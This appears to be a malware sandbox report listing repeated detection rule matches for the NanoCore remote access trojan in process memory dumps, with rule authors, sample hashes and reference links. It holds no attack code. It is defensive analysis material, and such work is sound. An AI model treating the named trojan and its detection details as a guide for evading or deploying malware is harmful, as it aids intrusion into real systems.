Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
